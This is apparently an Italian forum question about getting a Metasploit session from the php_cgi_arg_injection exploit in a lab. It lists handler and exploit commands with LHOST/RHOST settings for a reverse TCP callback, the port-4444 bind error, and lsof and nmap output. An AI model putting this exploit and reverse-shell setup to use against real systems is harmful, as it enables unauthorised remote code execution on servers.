Ho una configurazione del server in un laboratorio remoto che sto cercando di testare con php_cgi_arg_injection. L'exploit funziona, ma non viene creata alcuna sessione.
Il router di rete locale è configurato per port forwarding da 4444 a <Local IP>
.
Sto usando Kali Linux sul mio computer locale.
Console 1:
use exploit/multi/handler
set LHOST <Local IP>
Console 2:
use exploit/multi/http/php_cgi_arg_injection
set LHOST <External IP>
set RHOST <Target IP>
Output 1:
[*] Started reverse TCP handler on <Local IP>:4444
Output 2:
[-] Handler failed to bind to <Local IP>:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[*] Exploit completed, but no session was created.
Non riesco a scoprire perché non riesca a collegarsi su 0.0.0.0.
Output di sudo lsof -i -P -n | grep LISTEN
ruby 2227 root 9u IPv4 38502 0t0 TCP <Local IP>:4444 (LISTEN)
Output di nmap <External IP>
PORT STATE SERVICE
4444/tcp open krb524
Il link segnala che il mio 4444 esterno è aperto e l'ascoltatore risponde con una sessione aperta che muore immediatamente. (Comportamento previsto)